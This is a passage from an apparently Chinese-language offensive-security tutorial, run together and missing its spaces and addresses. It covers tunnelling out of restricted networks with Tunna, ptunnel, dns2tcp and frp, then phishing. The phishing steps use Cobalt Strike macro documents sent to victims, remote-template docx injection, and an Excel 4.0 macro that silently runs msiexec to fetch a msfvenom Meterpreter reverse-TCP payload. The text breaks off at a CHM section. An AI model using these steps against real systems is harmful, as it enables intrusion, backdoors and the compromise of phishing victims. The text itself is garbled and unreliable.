不用SOCKS代理--rport=REMOTE_PORTrREMOTE_PORTwebshell服務的遠程端口--addr=REMOTE_IPaREMOTE_IPwebshell（）Tunna代理遠Tunnaweb服務還算穩(wěn)定。項目地址/SECFORCE/Tunna場景應用Ab互通bc互通AcA已經(jīng)拿下B的權限，通過在b設置代理在訪問C3389端口。這種代理屬于正向代理。使用Tunna工具b的網(wǎng)站上傳conn.aspx一定要支持腳本運行。在A執(zhí)行python2proxy.py-u39/conn.aspx-l4321-a55-r3389–vA開啟新的終端輸入rdesktop:4321即可訪問C3389端口ICMPICMP在一些網(wǎng)絡環(huán)境中，如果不經(jīng)過認證，TCPUDP數(shù)據(jù)包都會被攔截。如果用戶ping通遠程計算機，就可以嘗試建立ICMPTCP數(shù)據(jù)通過該隧道發(fā)送，實現(xiàn)不受限的網(wǎng)絡訪問。用戶需要在受限制網(wǎng)絡之外，預先啟動該工具建立代理服務器。再以客戶端模式運行該工具，就可以建立ICMP隧道。為了避免該隧道被濫用，用戶還可以為隧道設置使用密碼。一、icmptunnel可以將IP流量封裝進IMCP的ping數(shù)據(jù)包中，旨在利用ping穿透防火墻的檢測，因為通常防火墻是不會屏蔽ping數(shù)據(jù)包的。二、請求端的Ping工具會在ICMP數(shù)據(jù)包后面附加上一段隨機的數(shù)據(jù)作為Payload，而響應端則會拷貝這段Payload到ICMP響應數(shù)據(jù)包中返還給請求端，用于識別和匹配Ping請求。三、在使用ptunnel進行內網(wǎng)穿透時，客戶端會將IP幀封裝在ICMP請求數(shù)據(jù)包中發(fā)送給服務器，而服務器端則會使用相匹配的ICMP響應數(shù)據(jù)包進行回復。這樣在旁人看來，網(wǎng)絡中傳播的僅僅只是正常的ICMP數(shù)據(jù)包。應用場景ab能互通bc能互通ac之間有防護墻攔截禁用TCP協(xié)議但是Apingc由此判斷防火墻沒有對icmp協(xié)議進行封禁。故可以用imcp隧道技術。b上執(zhí)行ptunnel-x12341234是密碼A上執(zhí)行ptunnel-p37-lp8080-da44-dp80-x1234-p接目的地址即跳板主機的地址-lp即localport本地端口-da我們要連接的地址-dp他的端口-x是密碼Ahttp://localhsot:8080即可訪問C80端口封禁tcp協(xié)議iptables-AINPUT-ptcp-s43-jDROP啟動80端口python-mhttp.server80DNSDNSDNS協(xié)議中傳輸建DNS是一個必不可少的服務，所以大部分防火墻和入侵檢測設備很少會過濾DNSDNSDNSTunnelingAPT攻擊中扮演著重要的角色。dns2tcpDNSTCPKEYTXT類型的C語言開發(fā)。它分為兩個部分，服務端和客戶端，服務端運行在linuxlinuxwindows上(其他平臺沒有測試過)，編譯完成后在服務端上的可執(zhí)行文件名稱為dns2tcpd，在客戶端(linux)上的名稱為dns2tcpc，kali默認安裝了二者。下述為主要參數(shù)及解釋，詳情請參考手冊。應用場景cbcDNS53端口進行封鎖，允許開53dns隧道。dns2tcpd-F 強制在在臺運行，默認在后臺-iIPaddress監(jiān)聽ip，默認-f配置文件指定使用的配置文件路徑-ddebuglevel指定調試級別，輸出相關級別日志，默認為1，2，3dns2tcpc-c :啟用壓縮-zdomain> :指定所使用的域名-d1|2|3> :調試級別(1,2or3)-r<resource> :訪問的目標資源-f<filename> :配置文件路徑-lport|-> :本地監(jiān)聽端口-T<TXT|KEY> :DNSTXT配置文件下：listen=port=53user=nobodychroot=/tmpdomain=<>resources=ssh::22,socks::1082,http::3128vpsudp53ubuntu18.04x64設置域名信息a記錄指向vpsipns記錄指向vpsBdns2tcpsudoapt-getinstall修改配置文件sudovi/etc/dns2tcpd.conflisten=port=53#Ifyouchangethisvalue,alsochangetheUSERvariablein/etc/default/dns2tcpduser=rootkey=moonsecchroot=/tmpdomain=resources=ssh::22,smtp::25解釋允許任何訪問listen=設置用戶user=root設置密碼key=moonsec在b終端執(zhí)行啟動dns2tcpd-f/etc/dns2tcpd.conf-F-d3如果出現(xiàn)錯誤可能端口被判斷idkill結束進程netstat-anp|grep53kill進程號阿里云默認的服務關閉systemctlstopsystemd-resolved在c下載客戶端執(zhí)行dns2tcpc-rssh-kmoonsec-z54-l8888-c-d3在c執(zhí)行命令sshroot@-p8888也用xshell代替登錄c8888B22ssh端口轉發(fā)再用proxifier代理Dns隧道數(shù)據(jù)包不過訪問數(shù)據(jù)很慢frpfrptcp,udphttp和https應用協(xié)議提供了額外的能力，且嘗試性支持了點對點穿透。詳細說明/fatedier/frp/blob/master/README_zh.md下載地址/fatedier/frp/releasesfrp的作用利用處于內網(wǎng)或防火墻后的機器，對外網(wǎng)環(huán)境提供http或httpshttp,https80和udp服務，例如在家里通過ssh訪問處于公司內網(wǎng)環(huán)境內的主機。frp支持的平臺darwinlinux386amd64armmipsmips64mips64lemipslewindows386amd64常用場景C80WEBC80B8000A8000C80WEBC2222ABCSSHC測試環(huán)境Bvps系統(tǒng)ubuntu18.04A與BFrp分為服務端和客戶端frps服務端為linux 負責處理請求，轉發(fā)流量Frpclinuxwindows再某云購買vps要修改規(guī)則frps配置服務器端在vps上下載軟件配置服務端wget/fatedier/frp/releases/download/v0.33.0/frp_0.33.0_linux_amd64.tar.gz解壓tarzxvffrp_0.33.0_linux_amd64.tar.gz重命名mvzxvffrp_0.33.0_linux_amd64frp進入目錄cdfrp刪除客戶端文件rm-rffrpc*配置服務端文件frps.ini[common]bind_port=7000token=moonsec2020bind_port客戶端連接的端口token密碼一定設置復雜運行./frps-cfrps.ini運行正常即可設置開機啟動vi/lib/systemd/system/frps.service[Unit]Description=frapsserviceAfter=network.targetsyslog.targetWants=network.target[Service]Type=simple#啟動服務的命令（frpsExecStart=/root/frp/frps-c/root/frp/frps.ini[Install]WantedBy=multi-user.target#啟動frpcsystemctlsystemctlstartfrps#設置為開機啟動systemctlenable以上服務端配置完畢，frps7000psauxnetstatantlfrpc配置客戶端下載對應系統(tǒng)版本的frpc配置客戶端信息[common]server_addr=54server_port=7000token=moonsec2020[ssh]type=tcplocal_ip=local_port=22remote_port=6000[web]type=tcplocal_ip=local_port=80remote_port=8000說明server_addr=54#服務器的IPserver_port=7000#服務器的端口token=moonsec2020#連接的密碼[web]#服務器名typetcp連接協(xié)議類型local_ip#ip可以是內網(wǎng)任何一個local_port80#本地端口remote_port=8000#遠程服務器的ip啟動frpc.exe-cfrpc.ini通信正常后用瀏覽器訪問整個流程就是客戶端與服務器端建立通信后，當A訪問B的的8000端口后，B收到請求對流量進行轉發(fā)，那么A就能訪問到C。網(wǎng)絡釣魚篇APT攻擊、勒索軟件攻擊等事件中，扮演了重要的角色。OfficeOfficeMacroOffice自帶的一種高級腳本特性，通VBAOfficeNormal模板上。BasicforApplications（VBA）Basic的一種宏語言，是微軟開發(fā)出來在其桌面應用程序中執(zhí)行通用的自動化(OLE)任務的編程語言。主要能用來WindowsMicrosoftOffice軟件，也可說是一種應Basic腳本。測試環(huán)境系統(tǒng)windows10x64word版本2016cobaltstrike4.0cobalt生成宏Attacks->Packages->MSOfficeMacro選擇好設置的監(jiān)聽器后復制宏代碼創(chuàng)建宏創(chuàng)建docx文件選擇自定義功能區(qū)把開發(fā)工具勾上點擊開發(fā)工具創(chuàng)建宏填寫名字宏的位置在當前文件名。auto_open自動打開保存文件提示選擇否另存為dotm文件至此一個簡單的宏文件完成。測試宏文件將文件發(fā)送給受害者，如果受害者打開。提示宏被禁用如果用戶點擊啟動內容。Cobaltstrike就會獲得受害人的beacon可以看到受害者已經(jīng)中了后門，可以對用戶進行其他方面的操作。DOCX釣魚攻擊時，您可以將.docx的文檔直接附加到電子郵件中，并且您不太可能根據(jù)文件的拓展名去阻止它。文檔加載附加word載模板執(zhí)行惡意模板的宏。檢測?；蚴?dotmVBA.docx文件，它本身不包含惡意代碼，只有指向惡意模板文件的目標鏈接。創(chuàng)建dotm文件這個跟上面的創(chuàng)建方法差不多新建文件docx文件選擇VIsualBasic雙擊ThisDocumen復制cobaltstrike惡意代碼到模板里保存另存為dotm文件將dotm文件放到遠程的服務器上創(chuàng)建遠程模板加載文檔打開word后選擇好模板文件保存即可docxzip再解壓接著修改word\_rels\settings.xml.rels里的Target改成dotm文件的訪問網(wǎng)址壓縮之后，將后輟zip改成docx執(zhí)行測試當受害人執(zhí)行docx文件是會從遠程加載的宏文件docx且隱蔽。Excel4.0Excel一般指MicrosoftOfficeExcelMicrosoftExcel是Microsoft為使用WindowsAppleMacintosh操作系統(tǒng)的電腦編寫的一款電子表格軟件。直觀的界面、出Excel成為最流行的個人officeExcelExcel文件里的宏就會被觸發(fā)。測試環(huán)境windows10x64excel2016metasplosit生成msi文件msfvenom-pwindows/meterpreter/reverse_tcplhost=80lport=1234-fmsi-ohack.msi將生成好的hack.msi放到遠程的服務器上監(jiān)聽器useexploit/multi/handlersetpayloadwindows/meterpreter/reverse_tcpsetlhost80setlport1234exploit-j打開excel底部右鍵插入宏表=EXEC("msiexec/q/i80/hack.msi")=HALT()Auto_Open文檔被打開時，自動運行宏。設置隱藏保存否保存為保存為xlsm當把文件發(fā)送給受害者受害人右鍵打開文件時就會自動運行宏。允許宏執(zhí)行宏會惡意請求遠程服務器msi文件自動下載運行。CHMCHM（CompiledHelpManual）即“已編譯的幫助文件”。它是微軟新一代HTML作源文，把幫助內容以類似數(shù)據(jù)庫的形式編譯儲CHM支持JavascriptVBscriptActiveXJavaAppletFlashJPEGPNG)(MIDURLInternetChm文件因何變得危險.Chm文件格式是HTML文件格式的擴展，它本來是一種用于給軟件應用程序作用戶手冊的特殊文本格式。簡單來說，HTML文件格式被壓縮和重整以后，就被制成了這種二進制的.Chm擴展文件格式。通常，.Chm文件格式由壓縮的HTML文件、圖像、Javascript這些文件組合而成，同時，它可能還帶有超鏈接目錄、索引以及全文檢索